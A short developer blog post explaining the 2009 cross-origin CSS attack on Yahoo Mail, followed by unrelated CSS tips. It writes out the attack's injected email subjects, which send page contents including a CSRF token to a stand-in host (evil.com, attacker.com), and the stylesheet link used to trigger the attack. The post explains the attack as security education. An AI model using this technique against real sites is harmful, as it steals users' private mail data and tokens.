Today I Learned - Rocky Kev

TIL CSS Vulnerability in Yahoo Mail

POSTED ON:

TAGS: css security vulnerability email

While reading this article, Jake Archibald's How to win at CORS - I learned about this amazing CSS exploit on Yahoo Mail servers.

CSS doesn't immediately fail on parse errors. In 2009 it turned out Yahoo Mail was vulnerable to a fairly simple exploit. The attacker sends the user one email with a subject including ');}, and later another with a subject including {}html{background:url('//evil.com/?

In 2009, Chris Evans published a description of the Cross Origin CSS technique for extracting private information from arbitrary sites bypassing the Same Origin Policy by loading the target page of the attacked site as CSS style. This technique was demonstrated using the example of Yahoo Mail:

  1. the attacker sends an email to the victim with the subject {}body{background:url(‘//attacker.com/?a=, the {} construction clears all previous errors in the CSS parser, and the quotation mark ' is not closed.

  2. some time passes, the victim receives new emails

  3. then the attacker sends a new email to the victim with the subject ');}, in which he closes the quotation mark ' and ends the CSS style. In the text of the message, the attacker encourages the victim to click on the link leading to the attacker's website.

Thus, on the Yahoo Mail view page, the text in the subject line of the two attacker's emails formed a valid CSS rule:

{}body{background:url('//attacker/?a=%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3493_AGvHtEQAAWFgSgIzgAlWYQXHqDY&3=q%22%3ESuper%20sensitive%20subject%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3933_AGTHtEQAAM%2FHSgIzawpE8Fwm1%2FI&5=x%22%3E');}

and between the emails there was a piece of HTML code containing a CSRF token (the mid= parameter) and the header of another private email.

The attacker's website simply loads the Yahoo! Mail with mail list as CSS style:

<link type='text/css' rel='stylesheet' href='https://m.yahoo.com/mail'>

As a result, all information between the two "tagged subjects" is sent to the attacker's site using the background CSS property and specifying the external address of the image for the background.

via Attacks: Cross Origin CSS

Related TILs

Tagged: css

TIL the alternate keyword

If 'alternate' appears along with the stylesheet keyword, the linked file is an alternative stylesheet. It won’t be applied to the document, but it will be ready for when we need it.

TIL Logical Properties

For that sweet sweet Internationalization you want to avoid directional words like 'left', 'right', 'top', and 'bottom'.

TIL Using pseudo-classes in your querySelector!

let notTuna = document.querySelectorAll('.sandwich:not(.tuna)')